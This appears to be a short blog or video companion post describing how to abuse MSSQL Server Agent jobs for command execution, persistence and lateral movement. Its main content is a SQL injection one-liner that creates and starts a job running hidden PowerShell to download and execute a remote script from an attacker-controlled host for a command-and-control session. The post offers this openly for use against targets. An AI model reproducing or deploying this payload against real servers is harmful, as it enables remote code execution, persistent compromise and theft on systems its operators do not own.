A companion video to a recent blog post I wrote. Use native MSSQL Server functionality to achieve command execution via a SQL query, in lieu of using xp_cmdshell. Can also be used to schedule persistent command execution, and abused to access other SQL servers (if the account running MSSQL Server Agent has access to them, or if you have ascertained credentials already).

In the video I use an example of a SQL injection condition that also abuses this method to achieve a remote command and control session on a target system.

Here is SQL syntax for creating and running a job, in a one liner for SQLi delviery:
USE msdb; EXEC dbo.sp_add_job @job_name = N’test_powershell_job1′ ; EXEC sp_add_jobstep @job_name = N’test_powershell_job1′, @step_name = N’test_powershell_name1′, @subsystem = N’PowerShell’, @command = N’powershell.exe -nop -w hidden -c “IEX ((new-object net.webclient).downloadstring(”http://IP_OR_HOSTNAME/file”))”‘, @retry_attempts = 1, @retry_interval = 5 ;EXEC dbo.sp_add_jobserver @job_name = N’test_powershell_job1′; EXEC dbo.sp_start_job N’test_powershell_job1’;